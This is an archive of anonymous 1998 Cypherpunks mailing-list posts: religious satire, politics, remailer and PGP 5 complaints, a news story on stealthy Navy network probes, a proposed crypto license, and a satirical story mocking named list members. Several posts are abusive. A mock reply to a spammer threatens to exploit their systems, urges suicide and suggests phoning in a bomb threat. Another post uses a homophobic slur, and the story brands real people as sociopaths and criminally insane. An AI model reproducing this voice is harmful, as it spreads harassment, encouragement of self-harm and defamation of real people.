@_author: Anonymous 
@_subject: No Subject 
As a thinker I find the term atheism dignifies the concept of theism, so I find it offensive.  Theists
are primitives and one needn't stoop.
In my religion, saying unprovable things in public
is a stonable offense.
Joe Momma

@_date: 1998-09-23 10:10:00
@_author: Anonymous 
@_subject: unknown_subject 
Oh wow, thanks for the update on the Clinton situation.  I'm grateful
since I couldn't find that information anywhere else, unless of course
I looked in the FIVE BILLION OTHER FORUMS BEATING THIS
GODDAMNED SUBJECT INTO THE GROUND!
Please do me a favor and FUCK OFF, or go stick your head up Clinton's
ass and quit spamming the list with FUCKING GARBAGE!  This shit is
worse than the sixdegrees mail.

@_date: 1998-09-23 14:19:53
@_author: Anonymous 
@_subject: Cypherpunks defeat? 
It's ironic that you would have to ask that question here.
The cypherpunks group was founded on this very premise: that through the
use of cryptography, people would become able to engage in a wide range
of voluntary transactions, outside of the reach of meddling interlopers.
Most cypherpunks have become disillusioned about their dreams, and you
will seldom hear them defend the notion that cryptography offers any kind
of alternative to a society based on coercion.  The past few years have
been hard ones.  The failure of digital cash, the gradual trend towards
a debate over when and how (rather than whether) to regulate domestic
cryptography, widespread abuse of anonymity, all these make the original
cypherpunk goals seem even more distant today than in the past.
Is the cypherpunks dream dead?  Is the movement over?
Maybe it is time to give up.  Throw in the towel, admit that we lost.
Sure, there are still battles to be fought, rear-ground actions where we
can perhaps delay the inevitable outcome.  But the vision has been lost,
and all that is left is the post-mortem analysis of the failed dream.

@_date: 1998-09-24 13:52:45
@_author: Anonymous 
@_subject: No Subject 
Just heard a tape of one of his radio appearences from Aug 1998. I'm not a
huge fan of country/filk music, but CJ is actually quite good. He
apparently wants a "Silly Horses In Trees" song on it to be passed along
to cypherpunks... --Declan

@_date: 1998-09-24 19:11:56
@_author: Anonymous 
@_subject: No Subject 
Be sure to drink plenty of fluids and get
plenty of rest afterwards; that stuff
wears you out ;-)

@_date: 1998-09-24 19:13:01
@_author: Anonymous 
@_subject: No Subject 
Basically this is unconstitutional seizure of your time = money.
This is slavery, which is prohibited, again by that pesky constitution.
The postal service sends datagrams; they are not acknowledged.
But you can't subvert if you don't participate.

@_date: 1998-09-24 19:15:34
@_author: Anonymous 
@_subject: No Subject 
"Ummmm...I left my laptop in a room full of Canadian snowboarders...dude"

@_date: 1998-09-24 19:24:36
@_author: Anonymous 
@_subject: No Subject 
GOD'S TOTAL QUALITY MANAGEMENT QUESTIONNAIRE
God would like to thank you for your belief and patronage. In order to
better serve your needs, God asks that you take a few moments to answer the
following questions.
Please keep in mind that your responses will be kept completely
confidential, and that you need not disclose your name or address unless
you prefer a direct response to comments or suggestions.
1. How did you find out about your deity?
__ Newspaper
__ Bible
__ Torah
__ Television
__ Book of Mormon
__ Divine Inspiration
__ Dead Sea Scrolls
__ My Mama Done Tol' Me
__ Near Death Experience
__ Near Life Experience
__ National Public Radio
__ Tabloid
__ Burning Shrubbery
__ Other (specify): _____________
2. Which model deity did you acquire?
__ Yahweh
__ Father, Son & Holy Ghost [Trinity Pak]
__ Jehovah
__ Jesus
__ Krishna
__ Zeus and entourage [Olympus Pak]
__ Odin and entourage [Valhalla Pak]
__ Allah
__ Satan
__ Gaia/Mother Earth/Mother Nature
__ None of the above, I was taken in by a false god
3. Did your God come to you undamaged, with all parts in good working order
and with no obvious breakage or missing attributes?
__ Yes __ No
If no, please describe the problems you initially encountered here. Please
indicate all that apply:
__ Not eternal
__ Finite in space/Does not occupy or inhabit the entire cosmos
__ Not omniscient
__ Not omnipotent
__ Not infinitely plastic (incapable of being all things to all creations)
__ Permits sex outside of marriage
__ Prohibits sex outside of marriage
__ Makes mistakes (Geraldo Rivera; Michael Jackson)
__ Makes or permits bad things to happen to good people
__ When beseeched, does not stay beseeched
__ Requires burnt offerings
__ Requires virgin sacrifices
4. What factors were relevant in your decision to acquire a deity? Please
check all that apply.
__ Indoctrinated by parents
__ Needed a reason to live
__ Indoctrinated by society
__ Needed focus in whom to despise
__ Imaginary friend grew up
__ Wanted to know Jesus in the Biblical sense
__ Hate to think for myself
__ Wanted to meet girls/boys
__ Fear of death
__ Wanted to piss off parents
__ Needed a day away from work
__ Desperate need for certainty
__ Like Organ Music
__ Need to feel Morally Superior
__ Thought Jerry Falwell was cool
__ Shit was falling out of the sky
__ My shrubbery caught fire and a loud voice commanded me to do it
5. Have you ever worshipped a deity before? Is so, which false god were you
fooled by? Please check all that apply.
__ Mick Jagger
__ Cthulhu
__ Baal
__ The Almighty Dollar
__ Bill Gates
__ Left Wing Liberalism
__ The Radical Right
__ Ra
__ Beelzebub
__ Barney T.B.P.D.
__ The Great Spirit
__ The Great Pumpkin
__ The Sun
__ Elvis
__ Cindy Crawford
__ The Moon
__ A burning shrubbery
__ Other: ________________
6. Are you currently using any other source of inspiration in addition to God?
Please check all that apply.
__ Tarot
__ Lottery
__ Astrology
__ Television
__ Fortune cookies
__ Ann Landers
__ Psychic Friends Network
__ Dianetics
__ Palmistry
__ Playboy and/or Playgirl
__ Self-help books
__ Sex, Drugs, Rock and Roll
__ Biorhythms
__ Alcohol
__ Bill Clinton
__ Tea Leaves
__ EST
__ The Internet
__ Mantras
__ Jimmy Swaggert
__ Crystals (not including Crystal Gayle)
__ Human Sacrifice
__ Pyramids
__ Wandering around a desert
__ Insurance policies
__ Burning Shrubbery
__ Barney T.B.P.D.
__ Teletubbies
__ Other:_____________________
__ None
7. God employs a limited degree of Divine Intervention to preserve the
balanced level of felt presence and blind faith.
Which would you prefer (circle one)?
a. More Divine Intervention
b. Less Divine Intervention
c. Current level of Divine Intervention is just right
d. Don't know...what's Divine Intervention?
8. God also attempts to maintain a balanced level of disasters and miracles.
Please rate on a scale of 1 - 5 his handling of the following:
(1=unsatisfactory, 5=excellent):
A. Disasters:
flood 1 2 3 4 5
famine 1 2 3 4 5
earthquake 1 2 3 4 5
war 1 2 3 4 5
pestilence 1 2 3 4 5
plague 1 2 3 4 5
SPAM 1 2 3 4 5
AOL 1 2 3 4 5
b. Miracles:
rescues 1 2 3 4 5
spontaneous remissions 1 2 3 4 5
stars hovering over jerkwater towns 1 2 3 4 5
crying statues 1 2 3 4 5
water changing to wine 1 2 3 4 5
walking on water 1 2 3 4 5
VCRs that set their own clocks 1 2 3 4 5
Saddam Hussein still alive 1 2 3 4 5
getting any sex whatsoever 1 2 3 4 5
9. Do you have any additional comments or suggestions for improving the
quality of God's services? (Attach an additional sheet if necessary):
If you are able to complete the questionnaire and return it to one of Our
conveniently located drop-off boxes by July 30 you will be entered in The
One Free Miracle of Your Choice drawing (chances of winning are
approximately one in 6.023 x 10 to the 23rd power, depending on number of
beings entered).
Thank You,
Clerk of the Supreme Being of the Apocalypse

@_date: 1998-09-24 21:14:58
@_author: Anonymous 
@_subject: Jury duty considered harmful, or at least rare 
Maybe you skipped class all the time. Maybe you didn't have to compete to
get into a competitive graduate school or graduate from that school. Maybe
you hold your "meetings" on the golf course and cheat your company. I
don't. That isn't the point.
Glad to hear that you make a habit of blowing off class and playing golf
on company time. Snip. That's nice for people who work at your company. It won't work for a small
business where the juror own and operates it. It also won't work for a
small business owner to hire more help and still pay the juror, because
then it's cheating the owner.
The court system summons the people under penalty of law. The court system
puts them on a jury. The government isn't repealing all the bullshit
legislation. The government can pay the bills. Can't afford it? Maybe we
should redirect some of that welfare money. That's primarily because of all the bullshit laws and legal events we
have: drug laws, computer crime laws, frivolous lawsuits, set-ups by the
cops, ITAR/EAR, and other things along that line of thought.
The last time I was called for jury duty was back in college, where they
got me in the week of finals. Of course, they hit me on that day, so I
have to jump through all sorts of hoops and seriously piss a couple of
professors off. Nothing keeps those professors from giving somebody like
that a harder final either, under the pretense that they might have talked
to others in the class about what the questions and answers were, which
means that their grades relative to others in the class are then skewed,
but the curve is still applied to them. Repeat with similar situations for
any profession which isn't like canning at a tomato sauce plant.
How many people do you think are found guilty because 11 people in the
jury think he should be, and 1 person in the jury thinks the law shouldn't
even be there but lets it go because the other 11 people on the jury don't
understand the concept of jury nullification, they all just want to go
home and not keep losing their livelihood, it *is* the law no matter how
unconstitutional it may be, and the offense is relatively minor anyway?

@_date: 1998-09-25 01:24:19
@_author: Anonymous 
@_subject: No Subject 
Friday, September 25, 1998 - 08:08:49 MET
You know for what the acronym CLINTON stands for  ?
Call Lewinsky, I Need The Oral Now !

@_date: 1998-09-25 15:44:42
@_author: Anonymous 
@_subject: No Subject 
This was almost funny. Too bad the following sentences also work:
I'd like to drink frog urine
I'd like to hug large, purple dinosaurs
I'd like to cook onions with garlic and tomatoes
I'd like to strangle you with a mouse cable

@_date: 1998-09-25 16:41:14
@_author: Anonymous 
@_subject: No Subject 
Flowers for Alger Anon
                                       - FPP
  The two youths ducked quickly behind a tree to avoid
being spotted by the senile old fart who had finally given up
on finding his shoes and climbed barefoot up the step-ladder
to begin drilling out the cannon muzzle on the War Surplus
Army Tank he had recently acquired.
  As he labored he mumbled grouchily to himself about
how he was going to "show that Commie Bastard, Igor", and all
of the other former residents of The Home(TM) what he thought
of their efforts to take over "his" CypherPunks Mailing List.
  "Distributed, my ass!" the old fart scowled as he
climbed down the ladder, then grinned madly as he patted the
stack of shells sitting next to the tank.
  "I'll distribute those bastards...They should'a
Checked The Archives", he said, pausing to scratch his head
and add, "TradeMark". Then continuing, "before they fucked
with me. Then they'da seen how I ChopChopped them Torah-
Torah Bastards when they tried to muscle in on my list."
  "It's 'mine'!" the grouchy, paranoid old fart shouted,
turning his head around quickly in all directions, as if
challenging, and half-expecting, Unseen Beings to dispute
his claim.
  The two youngsters ducked and tried not to giggle
as they ran down the hill, finally collapsing on the dirt
road near the bottom and venting their laughter.
  Tim C. May was the most hilarious of the Cypher
Punks they'd investigated so far, but 'all' of the CPUNX
were "more than suitable", as Carol Anne Cypherpunk had
declared while they were evaluating Jim Choate, "for slicing
and buttering, and placing on a tray of Christmas snacks."
  Blanc Weber had agreed heartily with the new
coconspirator (sometimes spelled with a hyphen), in their
'Quest to Question Anonymity', as the Army o' Dog-Bitch
Battallion Warrior Godesses, as they had proclaimed them-
selves, had Code Named their Chosen Mission From Dog.
  Carol Anne, choosing Androgyny over Anonymity,
changed her name to Carroll for The Mission, vowing to
balance the Tao by taking on any tasks requiring "male
energy", which, on a CypherPunks Mission From Dog(TM),
Carroll stated with a straight face, might include
"blowing Dimitri".
  The Girls(Maybe) split a gut laughing over Blanc's
reply that, being of a more peaceful nature than the 'Nuke
DC Clique', they might have to "blow" their way out of
dangerous situations by the use of Soft Targets rather
than with Heavy Weaponry.
  Then they decided to get serious, before they, too,
became candidates for The Home.
  Blanc Weber, a veteran Cypher Punk Cult of One
Neophyte(TM) had felt slighted when the Author, a relative
newcomer to the CPUNX list (at least under his 'TOTO' persona),
had chosen to initiate two male Cypher Punks, Back and
McCrackin, into his 3-Entity Circle of Eunuchs Gorilla Cell,
instead of including Blanc, who had established a fairly
close rapport with TOTO in their private email exchanges.
   Even more to Blanc's surprise, disappointment,
and suspicion, TOTO failed to respond even to her offer to
engage in joint Army of Dog Maneuvers with him across various
Electronic Boundaries of the InterNet.  She had begun to
suspect that TOTO's lack of response to her Digital Warrior
overtures were the result of something more sinister than
simple male chauvinism.
   Her suspicions were confirmed when she caught up
with TOTO, using his CJ Parker alias, at Defcon 6.0, as he
was Pontificating, under the guise of 'Chief Cypher Punks
Spokes Person', on the 'Anonymizer', for a guillible group
of young hackers.
   "It is run by a HedgeHog riding Lance's Coat Tails,
since Lance invented that thing that hangs on the back of
toilet bowls, and the Anonymizer is the Blue Thing that
hangs on the back of the hard drive.
   Blanc, stunned that TOTO, who claimed to be the
Author, was a Total Fucking Moron (TM), listened as he
continued .
   "The Anonymizer prevents Peeping TOMS from being
able to tell whose hairy dick is making a bad smell on the
carpet of the recipient's computer, after No Mail from
NoBody comes out of the Email Chutechute.
  Blanc realized that CJ Parker was also a Total
Fucking Lunatic(TM) as he glanced furtively around to
whisper a dire warning to the spellbound young hackers
hanging on his everyword.
  "And the Peeping Toms are everywhere.
  "As a matter of fact", he added glancing quickly
over both shoulders, "when you can't see them at all..."
he paused for effect, "...then you know that they're 'good'".
  "Real good", he added, turning to direct his
wild-eyed stare at Blanc, who had just finished going
through his knapsack while he was distracted.
  Blanc had hurried away, deeply disturbed by what
she had found in TOTO's bag.  It wasn't just stationery
from The Home--it was 'personalized' stationery from
The Home for the Criminally Insane.
  Blanc Weber's confusion and suspicions deepened
when her attempts to warn other CPUNKS about TOTO were
ignored by all except the few apparent females on the list,
such as Carol Anne Cypherpunk and World Renowned Bottle
Collector Lynn Harrison (who was long rumored to have
joined the male-dominated mailing list only as a forum
to trade her panties to young CPUNX in the throbbing
throes of puberty, in return for the Standard Issue Klien
Bottles, they received upon joining the Digital Anarchist
Union, Local 01, rumored to be headquartered in Bienfait,
  When The Girls(Maybe) of the Bitch Battallion took
to the road to investigate the remaining CypherPunks, they
quickly discovered that 'all' of the verifiable Meat Space
Personalities they positively linked to the various
Cyperpunks Consistent Net Personas (TM) were, in fact,
certifiably Cuckoo Cock Suckers(TM) in MeatSpace Reality.
With the only readily apparent link between them being
their connection to the Home for the Criminally Insane.
  Some of the MeatSpace Personalities behind the
Digital Personas on the CPUNX Mailing List--Ian Goldberg,
Alec de Jeune, Ulf Moeller, Peter Trei and Jim Choate--were
Highly Social Sociopaths, capable of putting ona suit and
tie, if need be, and glad-handing business people and
purchasing agents (all the while slitting their sleeping
throats, in the Dark Corners of their mind).
  John Gilmore, Declan McCullagh, Robert Hettinga,
Vin McClellan, even Froomkin--all of the Mainstream
Dream/Actively Connected To Society/Cypherpunks MeatSpace
Verifiable Identities, without fail, shared the same
connection to The Home as id the Lithium Dream/Social
Outcast CPUNX Meatballs such as T.C. May, A.T. Hun,
Wm Geiger III, S. Sequencr, JYA, and the late Dale Thorn
(whose mysterious death was rumored to be the work of the
Shadowy Figures(TM) lurking behind the ctrl-alt-delete.com
  Blanc and Carroll watched in total amazement as
Jim Choate's ludicrous/inane computer and business theories
seemed to be somehow transformed, by unseen hands working
behind the scenes, into fully functional and viable
RealWorld(TM) concepts, in Choate's work with the Armadillo
Group.  The Unseen Hands made The Girls(Maybe) very, very
  What pushed the Army of Dog-Bitch Battalion
Warrior Godesses beyond nervousness, toward Paranoia & Fear,
was the fact that the MeatSpace Personalities behind the
Digital Personas of the CypherPunks inevitably appeared
to be verifiable outside of The Home 'only after the
CPUNKS PERSONA'S original appearance on the mailing list'.
  A Cloaked Anonymous Random Source(TM) that The
Girls(Maybe) knew only as Digital Throat, speaking to
Larynx in an UnderGround Reptilian Nazi Parking Garage
in DC (after having been fooled into believing she was
talking to Defcon McCullagh Chain Saw). told them,
"I was the head of the Personelle Department at Intel,
at the time Tim May claims to have been there.
  "Even though we couldn't spell the name of our
Department right, let alone the names of the employees,
I never forget a face, and Tim C. May definitely was
never employed at Intel.
  "As a matter of fact", Digital Throat revealed,
"when Intel's Legall Department sent Mr. May a letter
that warned him to Cease & Decist with his claims, he
showed up on our doorstep, barefoot, in a MailMan's Uniform,
with a Veritable ShitLoad(TM) of heavy weapons and arms,
and, after that, as far as most of us were concerned,
if Tim c. May said he was the goddam 'President' of
Intel, then he was the goddam President--end of story."
  Blanc Weber and Carol Anne Cypherpunk found the
same patterns repeated time and again in their investiga-
tions of CypherPunks MeatSpace Ident Histories.
  Records, Information and Data-- such as birth
certificates, school records, credit and employment
histories-- were not only 'existant', but were inevitably
'consistent' with claims made in posts to the CPUNKS
mailing list, in regard to the MeatSpace Ident Histories
behind the Digital Personas.
  However, once The Girls(Maybe) had begun
researching the Human Historical Records of the MeatSpace
Ident Histories--speaking to alleged friends, family,
coworkers, and the like--the paper Trails quickly
unravelled, and the Physical Ident Histories of ALL of
the male subscribers to the CypherPunks Disturbed Male
LISP were, in the end, traceable 'only' back to the Home...

@_date: 1998-09-25 16:41:25
@_author: Anonymous 
@_subject: unknown_subject 
How about:
I'd like humping your mom with a prosthetic limb.
I'd like Hillary to get down on both knees and eat out Monica's ass.
I'd like nothing more than for anyone who even thinks about mentioning
Bill Clinton to spontaneously combust, preferably right in front of a gas
pump where his whole family is sitting in some sort of catatonic stupor,
unable to digest any information beyond that which The Machine feeds
them every day.
Who the fuck wouldn't drink to that?  For Christ's sake, I'd be buying!

@_date: 1998-09-25 18:55:44
@_author: Anonymous 
@_subject: No Subject 
"More importantly, as Noam Chomsky points out in "Manufacturing Consent",
lying politicians are the modern democratic equivalent of feudal tyrants
beating or executing citizens in more "uncivilized times".  "
Zappa said politics was the entertainment branch of industry.

@_date: 1998-09-26 13:55:59
@_author: Anonymous 
@_subject: Test [No Reply] 
And we have a winner for this weeks free AOL account!!  Well done Jim! ;-)

@_date: 1998-09-26 15:40:10
@_author: Anonymous 
@_subject: No Subject 
Navy fights new hack method
Tim Clark
CNET NEWS.COM
Hackers are banding together across the globe to mount low-visibility
attacks in an effort to sneak under the radar of security specialists and
intrusion detection software, a U.S. Navy network security team said today. Coordinated attacks from up to 15 different locations on several continents
have been detected, and Navy experts believe that the attackers garner
information by probing Navy Web sites and then share it among themselves. "These new patterns are really hard to decipher--you need expert forensics
to get the smoking gun," said Stephen Northcutt, head of the Shadow
intrusion detection team at the Naval Surface Warfare Center. "To know
what's really happening will require law enforcement to get hold of the
hackers' code so we can disassemble it." The new method involves sending as few as two suspicious probes per hour to
a host computer, a level of interest that usually won't be detected by
standard countermeasures. But by pooling information learned from those
probes, hackers can garner considerable knowledge about a site. Northcutt said the new technique for attacks was discovered only this month
and has been detected at Defense Department facilities as well as in
private sector sites, including some outside the United States. The Shadow group has posted descriptions of the attacks and
countermeasures, and the information has been forwarded to CERT, which
investigates security attacks. "Most intrusion detection systems have a threshold, a radar. These attacks
are intentionally sliding under that threshold so normal intrusion
detection tools will not detect them," said Tim Aldrich, principal analyst
at the Navy facility. The Shadow team said that although the new method is harder to detect, it
should not affect sites that are well-secured. But the technique puts sites
with weak security at greater risk. The attacks do not involve a new hacker tool or new kind of attack, but
rather represent a low-visibility technique for perpetrating attacks. For
example, one coordinated attack that involved at least 14 locations simply
probed a Web site for security weaknesses without mounting a break-in. The Shadow Intrusion Detection team said it cannot determine how many
people might be involved in the attacks--hackers frequently use many
different machines to launch their attacks. But the number of individuals
involved is less important than the technique itself, Northcutt said. The technique could be used to scan or mount attacks from more than 100
Internet addresses. The security experts also suggested that makers of
commercial intrusion detection software need to counter the new method. "This stealthy probing enables large amounts of parallel firepower, which
means many attack attempts [from many sites] over a short time frame," said
a note distributed by the System Administration Networking and Security
(SANS) Institute. Going public with a news of new hacker techniques is somewhat unusual in
the secretive network security community, which often fears that
publicizing attacks before countermeasures are known will tip off attackers
to vulnerabilities. "We went public in hopes of raising awareness," Northcutt said. "You're
only going to be able to find stealthy stuff by looking for stealthy stuff." But before publicizing the new hacker technique, he added, the Shadow team
had checked to be certain it would not jeopardize any official actions
against the attackers. He also thinks that users of the attack may be caught. "If they're working together, it ought to be easier to track them down
because they leave more of a trail," he said.

@_date: 1998-09-26 20:12:33
@_author: Anonymous 
@_subject: unknown_subject 
Whenever these people troll for flames here they get them one way or
another. Then it seems Merrill always tries to take the moral high ground and show us all his bleeding heart and tell us how we should embrace the AOL idiots and cherish them. The AOLers get triple effect that way. I don't think Merrill ever misses a chance to defend AOL and attack anybody who attacks them. About a week ago somebody posted a copy or parts of most AOL postings which were sent here in the last months. Merrill ignores the part about how the posts were classified and sends back some vague flame accusing the author of classing posts he disagreed with as "clueless" then he quotes the entire thing back to the list.
I don't know which is worse. At least the people flaming the AOL wimps are

@_date: 1998-09-27 00:41:52
@_author: Anonymous 
@_subject: unknown_subject 
Yeah, if you quote back over a hundred lines after adding 6, 8, or
whatever it happened to be.
And where did he not? A few could be debated. The rest were either written
so badly that they were incomprehensible, were off-topic, or didn't
include quoted material in a reply/followup. He also stated that he was
counting postings which used that '<< >>' scheme as automatically bad,
which is understandable. Either way, he seemed to be trying to show the
statistics. Pull one or two postings off of one side and put them on the
other and the statistics are still pretty bad for AOL.
No, I want a Cypherpunks list which discusses political issues,
cryptography, and things related to that. Since this is the Cypherpunks
list, we aren't going to censor on the basis of content or origin point.
If all you want to do is defend AOL and their ilk, may I recommend
comp.os.ms-windows.advocacy and alt.aol-sucks.
Muff diving pics? Do we want to know? Serious questions.

@_date: 1998-09-27 13:47:32
@_author: Anonymous 
@_subject: Remailers, PGP, and a Project Suggestion 
Even this is a secondary issue.
Many people are using remailers these days because of the advent of the
WWW. Virtually anything written, retrieved, or transfered on the Internet
is vulnerable to monitoring, logging, and future use against you. Even if
you trust the guy you're sending mail to, you can't necessarily trust his
computer security or the security of the network. Systems like Dejanews
and the web search engines illustrate just how much of a log is out there.
That isn't counting the information available solely from mail headers and
IP addresses.
When somebody wants to perform a "great purge," they just go off to a
search engine or database, type in some parameters, and get a list of
people to shoot, jail, or harass.
The natural solution to this is to disguise your identity whenever
possible. I estimate that we have several dozen people who actively post
to Cypherpunks through remailers judging by the way some things are stated
in the postings. I can't tell for sure, and that's the point.
If you want to generate reputation capital, use a nym server. Nym servers
make it obvious that you're using a nym, but it allows you to generate as
many reputations as you want and keep them separate. They're hard to use
without a tool, even for the best of us. Premail leaves a lot to be
desired in that it's slow, has some bugs, and lacks some good features,
but most of the people who want to create a new version seem to live in
the U.S..
The real advantage of the nym servers is that they allow people to see the
origin of the message at a glance. You can do the same thing with regular
anonymous remailers, but you have to verify the signature rather than
glancing at the headers. You should still verify the signature in either
case. This was less of a problem than it once was because premail was out
there, until PGP 5 came out.
PGP 5.x is incompatable with previous versions since it changed both the
protocols and the command line interface. Unfortunately, they changed the
command line interface in a rather stupid way. They also wound up
releasing the Windows version before the UNIX version (by something like
three months).
They seem to check argv[0] to determine what kind of operation you want to
do. 'pgp -seat' won't work anymore. Instead, it's a variant under 'pgpe'.
One PGP binary is created, and several links are set up. The result is
that you can't change the name of the binaries and links if you want. If
there's an advantage to this, I sure don't see it.
When they released the Windows version, Windows users understandably
snatched it up and started using it. The result was a bunch of
incompatabilities between two platforms which could have easily been
solved had PGP, Inc. exercised a little more discression.
That's a moot point now, though. The problem which still remains is the
command line interface. It breaks any script which references PGP, and
that's the main problem.
What UNIX really needs is some kind of mailer which integrates an updated
premail, PGP 2.x support, and PGP 5.x support. Unfortunately, much to the
delight of the government, the people who would code such a thing are
probably in the U.S. like I am.

@_date: 1998-09-27 18:27:45
@_author: Anonymous 
@_subject: No Subject 
Sunday, September 27, 1998 - 23:06:35 MET
First of all I want to say that the last posting I
did to cypherpunks at cyberpass.net did not reach
the intended recipients.
And two,  I would be more than glad to do the coding. I am
not in the US. However, the only thing that stops
me is the fact that I just don't know enough

@_date: 1998-09-28 12:45:47
@_author: Anonymous 
@_subject: faggots 
My only regret is that someone is gonna have to spring for the wienies
for or wienie roast in hell.  This guy's is obviously too small to use.

@_date: 1998-09-28 12:57:36
@_author: Anonymous 
@_subject: Website owner/administrator 
We appreciate your considerate mail, but we have already setup our
e-commerce section of our website.  However, we would really
appreciate some feedback.  What this would require is that you send
us a list of valid credit card numbers, preferably 500 or more, and then
we can show you that none of these will be compromised in the next
We have every faith in our e-commerce line, and we'd really love to have
industry leaders such as you help prove it!  Please send the list, along
with expiration dates, to cypherpunks at toad.com.

@_date: 1998-09-28 13:04:36
@_author: Anonymous 
@_subject: Police would never exagerate ? Guess what... 
I think the 165 year old boy has some more serious problems to worry
about.  Like how to get rid of that smell emanating from his decomposing
body, and how to make people stop running in fear at the sight of him.
Nobody like a zombie.

@_date: 1998-09-29 00:12:55
@_author: Anonymous 
@_subject: Toto -- mimic function or the real thing (Re: no subject) 
He could have been one of the guys sending the insults to the spammers
(which I applaud, mind you) and who got into that argument with Paul Meril,
but the wording isn't anywhere near what we've come to expect from Toto. The
two gay sex responses to one of the Six Degrees of Spam users sounds just
like something he might do.
If Toto has been here all along, I think this is one of the most clever
hoaxes which has hit the list in a long time.

@_date: 1998-09-29 02:27:18
@_author: Anonymous 
@_subject: Mailing-List 
Our mailing list is devoted to the intelligent people who are fighting fo
our freedom using crypto.  although you may fall into the category of
enjoying crypto you are obviously stupid and therefore not what this list is
aimed at.  An intelligent person would ot have sent a message to all the
people on the list asking a dumb question.  There are also a number of
hackers on our list and annoying them means flames galore (possibly)  My
advice is to get an aol account where you will be welcomed

@_date: 1998-09-29 02:56:31
@_author: Anonymous 
@_subject: Unix virus 
aside from the fact that for a virus to correctly write to files on the unix
system you would need to have suffficiant read/write access,  you are
obviously too stupid to be able to accomplish this successfully.  One way to
ruin the system would be with a gun, that  is about the best that you will
be able to do considering your intellect.

@_date: 1998-09-29 06:58:33
@_author: Anonymous 
@_subject: Joe Farah 9/14 (Pppbbbttt) 
Everybody's belief/morals are different.  For instance I take that
last paragraph of yours and laugh at it.  To many americans doing so
would not be immoral because many people don't believe in god.  Your
moral yardstick would be different from mine.  People in the bible
belt have different morals from those in las vegas.  If I had religous
right morals I'd kill myself.
fit to be
right and
Whether this
your mind
"The same thing we do every night Pinkey,
 try to take over the WORLD!"
                          - The brain
DO YOU YAHOO!?
Get your free  address at

@_date: 1998-09-29 07:18:26
@_author: Anonymous 
@_subject: Democracy... 
The government can't make laws favoring one religion thereby
restricting another religion.  The urban legend that it was only meant
to stop government from restricting a religion was a misquote from
some misguided pastor.  Separation of church and state is just that,
that is what the country was founded on.  This is also a thread for
the lists and newsgroups that it was intended for.
PRACTICE of
"The same thing we do every night Pinkey,
 try to take over the WORLD!"
                          - The brain
DO YOU YAHOO!?
Get your free  address at

@_date: 1998-09-29 13:58:07
@_author: Anonymous 
@_subject: No Subject 
Well, for some months now they've password protected some of the more
delicate stuff (e.g., "lessons learned", some of the field manuals).  And
they have been rejecting non .mil addresses too.
Certainly we can expect them to eventually get a clue and think about what's out there.  Mostly they have.  (Of course it was within
the last year that a .mil was exporting PGP!) The army's over-reaction
is quaint but essentially reasonable --the W3 pages are just PR,
and they're real edgy these days after they tried to scalp Osama
with a tomohawk.
[digression: I wonder when Osama will have his own web page with matching
funds for the head of the Great Satan, and whether there would
be a shootout on the net, e.g., the DNS records being changed, a
phone call to their ISP]
As far as the NSA's online personnel records, I bet they're still worried
about the CIA shootout down the street a few years back.
There's still plenty of names, phones, email addresses in the .gov domain, with building locations, etc.  But Jim Bell is
locked up so they're not so uptight.
They keep trying different passwords to the constitution.
Its a dictionary attack: "pedophile", "droogs", "terrorist", "WMD", etc.
--Ceci n'est-ce pas un Toto

@_date: 1998-09-29 18:20:05
@_author: Anonymous 
@_subject: GoLive CyberStudio 30-day Activation Key 
Dear Dumbshit,
Thank you for spamming the Cypherpunks list with an ad for your crippleware
and your lame, pathetically designed web site.
Your official 30-day activation key is: ISUCKANDCANTWRITEHTMLANDISPAM
You'll need to enter this key when you try to activate your brain.
Included in response to all spams to the Cypherpunks list are free tests
which will be run on your system. Any security holes we find will not be
reported, but exploited.
NOTE: If you are using FuckIt Spammer 1.0.x to spam your ad, please make
sure you walk off a high-rise ledge and fall several hundred feet or we may
have to make sure you do it, and you probably don't want that.
If you have questions about your computer security, you do not need to send
to Cypherpunks. You have already requested that your machine be checked for
all security holes and that any found will be exploited to make you look
even stupider than you make yourselves look. We also suggest you learn how to make a web site. Please visit  If you
don't find your answers there, please walk in front of an 18-wheeler going
70mph, or call 911 and phone in a bomb threat.
When you are ready to put yourself out of our misery, please slash your wrists and play vampire. It's simple so your simple minds should be able to
handle it, but it is a little messy.
The Cypherpunks
cypherpunks at cyberpass.net
On Tue, 29 Sep 1998 sales at golive.com spammed:

@_date: 1998-09-30 06:35:05
@_author: Anonymous 
@_subject: Democracy... 
I find that religion is one of the most detrimental forces to the
internet.  I believe that the internet is a very real chance to assert
self-rule.  A religious government would not allow that.  I might
worship false idols or something.  If government does start to favor
religious morals I hope it is voodoo!  That would at least add some
entertainment :)
"The same thing we do every night Pinkey,
 try to take over the WORLD!"
                          - The brain
DO YOU YAHOO!?
Get your free  address at

@_date: 1998-09-30 19:59:42
@_author: Anonymous 
@_subject: No Subject 
You just pegged my bogometer.
The GNU GPL discourages the sale of proprietary software by prohibiting
anything using code covered by the license from being proprietary, and
that's right.
The proposed Cypherpunks license discourages the distribution of software
with key recovery (= government back doors) by prohibiting anything using
code covered by the license from having key recovery, and that's wrong.
Both these licenses would be trying to promote their propagators' goals
through restrictions on code re-use. However, Cypherpunks and GNU types
don't have exactly the same goals. GNU types consider the availability of
good, non-proprietary software to be paramount, whereas Cypherpunks
generally consider the use of good cryptography in useful applications to
be paramount, whether the code behind it is free or expensive, open-source
or proprietary (although proprietary code often ends up being bad crypto).
Companies will not put good crypto in useful applications if it
necessitates that they all but give up whatever intellectual property
rights they had to other parts -- even non-crypto-related parts -- of the
application, so the GPL is clearly not the best license for to promote
Cypherpunk goals.
On a different tangent, lemme suggest some vague ideas for a few potential
Warnings about proprietary code: Authors of products using CPL-covered
code which do not release all source code must either a> clearly
demonstrate that none of the unreleased code can have a negative impact on
security or b> place a message on any marketing materials or documentation
mentioning the product's security features saying "For important warnings
about this product's security, see ."
CPL advert: Authors of products using CPL-covered code are required to
include with their copyright information some message like "This product
uses code covered by the Cypherpunk License for its security features. See
 for more information." and are requested to include references to
the site in other convenient places. This site, of course, need not be
limited to dry legalese about the license, but may include vivid
descriptions of driftnet wiretaps and other mischief perpetrated by NSA
and friends, cryptopolitical rants, or even tools for building and setting
up various cryptostuff. Note the "may;" lots of stuff requires lots of
work, and so, unless there was sort of backing from a civil-liberties
organization with staff-hours to spare or some miraculous effort of
miracle of organization...how's that secure talk client going?
Strength requirements: By default and taking into account only the
published attacks on the cryptographic primitives used, an average of at
least 2^79 operations must be required for anybody (law-enforcement or
not) to compromise the product's security features. If and only if laws
restrict this software's use or sale, a second version may be created with
lower strength, and the stronger version may operate at lower strength
when necessary for smooth interoperation, provided that the user knows
before sending any information that the connection uses weakened
